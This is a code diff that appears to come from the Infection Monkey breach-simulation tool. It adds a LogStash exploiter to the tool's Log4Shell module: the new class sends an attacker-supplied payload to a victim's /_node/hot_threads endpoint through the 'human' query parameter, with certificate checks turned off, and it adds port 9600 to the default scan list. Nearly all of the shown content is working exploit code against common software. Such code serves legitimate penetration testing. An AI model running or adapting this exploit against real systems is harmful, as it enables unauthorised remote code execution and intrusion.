Agent, Island: Add Logstash service to Log4Shell exploit

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py

@@ -4,7 +4,8 @@ from .i_service_exploiter import IServiceExploiter
 from .poc_docker import DockerPOCExploit
 from .solr import SolrExploit
 from .tomcat import TomcatExploit
+from .logstash import LogStashExploit
 
 
 def get_log4shell_service_exploiters() -> List[IServiceExploiter]:
-    return [DockerPOCExploit(), SolrExploit(), TomcatExploit()]
+    return [DockerPOCExploit(), SolrExploit(), TomcatExploit(), LogStashExploit()]

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py

@@ -0,0 +1,20 @@
+from logging import getLogger
+
+import requests
+
+from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
+from infection_monkey.model import VictimHost
+
+logger = getLogger(__name__)
+
+
+class LogStashExploit(IServiceExploiter):
+    service_name = "LogStash"
+
+    @staticmethod
+    def trigger_exploit(payload: str, host: VictimHost, port: int):
+        url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
+        try:
+            resp = requests.get(url, timeout=5, verify=False)  # noqa DUO123
+        except requests.ReadTimeout as e:
+            logger.debug(f"Log4shell request failed {e}")

monkey/monkey_island/cc/services/config_schema/internal.py

@@ -129,7 +129,7 @@ INTERNAL = {
                             "type": "array",
                             "uniqueItems": True,
                             "items": {"type": "integer"},
-                            "default": [80, 8080, 443, 8008, 7001, 9200, 8983],
+                            "default": [80, 8080, 443, 8008, 7001, 9200, 8983, 9600],
                             "description": "List of ports the monkey will check if are being used "
                             "for HTTP",
                         },